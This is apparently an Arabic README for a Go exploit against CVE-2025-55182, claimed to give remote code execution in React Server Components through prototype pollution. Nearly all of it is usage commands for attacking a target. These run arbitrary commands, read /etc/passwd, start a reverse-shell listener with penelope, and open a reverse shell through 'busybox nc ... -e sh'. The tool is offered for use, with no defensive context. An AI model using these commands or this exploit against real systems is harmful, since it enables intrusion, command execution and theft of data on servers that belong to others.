
استغلال مبني على Go لـ CVE-2025-55182، يحقق تنفيذ كود عن بعد في React Server Components عبر تلوث النموذج الأولي. يدعم تنفيذ الأوامر العشوائية وحمولات الصدفة العكسية.
استغلال لثغرة تنفيذ أوامر عن بُعد في مكونات خادم React عبر تلويث النموذج الأولي.
go run main.go -t <target> -c <command>
go run main.go -t http://127.0.0.1 -c "id"
go run main.go -t http://127.0.0.1 -c "ls -la"
go run main.go -t http://127.0.0.1 -c "cat /etc/passwd"
إعداد الشل العكسي
penelope -i 0.0.0.0 -p 1337
استخدم busybox:
go run main.go -t http://127.0.0.1 -c "busybox nc 127.0.0.1 1337 -e sh"
go build -o exploit .